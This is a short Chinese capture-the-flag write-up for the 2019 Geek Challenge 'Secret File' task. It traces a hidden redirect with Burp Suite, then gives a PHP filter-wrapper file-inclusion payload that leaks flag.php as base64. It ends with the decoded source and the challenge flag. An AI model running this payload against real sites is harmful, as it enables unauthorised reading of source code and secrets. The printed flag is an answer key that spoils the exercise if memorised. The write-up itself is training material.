[极客大挑战 2019]Secret File

看颜色漆黑一片，下意识往下滑了一下，然后发现在最下面有个小秘密
查看一下
直接跳转到了end.php，欸~这事情不对呀
然后回到上个界面将光标放在SECRET上面看左下角
啊哈，抓到了，目标页面应该是去action.php的然后访问时出点小问题。。。
上神器 bp，设置好代理，开始抓包
随手丢到重放中 Ctrl+r ，然后点击下go
发下还有一个页面 secr3t.php ，访问下
又是审计。。。
和上一题一样又是伪协议，同样的这里并没过滤php协议，所以依旧可以base64查看源码
?file=php://filter/read=convert.base64-encode/resource=flag.php
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Yzc0NGRiNDctNjZmYi00NjFiLWE4MzktYzFlZThmODNiODE5fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
base64解密
拿到flag

flag{c744db47-66fb-461b-a839-c1ee8f83b819}

顺手访问下flag.php页面
至此一天5题，晚安了师傅们~